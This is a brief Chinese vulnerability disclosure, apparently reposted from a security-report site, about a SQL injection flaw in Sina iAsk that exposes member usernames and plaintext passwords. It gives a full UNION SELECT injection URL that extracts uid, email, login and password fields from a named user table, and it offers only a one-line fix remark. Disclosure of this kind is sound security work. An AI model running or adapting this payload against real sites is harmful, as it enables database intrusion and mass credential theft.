详细说明:新浪爱问存在sql注射 漏洞 ,可以查询爱问会员库中用户名与密码(明文), 数据库 内大概纪录7000w条用户信息。 http://iask.sina测试数据.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11-- 漏洞证明: 修复方案:注射只是问题表面,更深层次的问题在于会员库存储机制的改进
查看更多关于新浪爱问sql注射导致会员密码泄漏及修复方案的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12613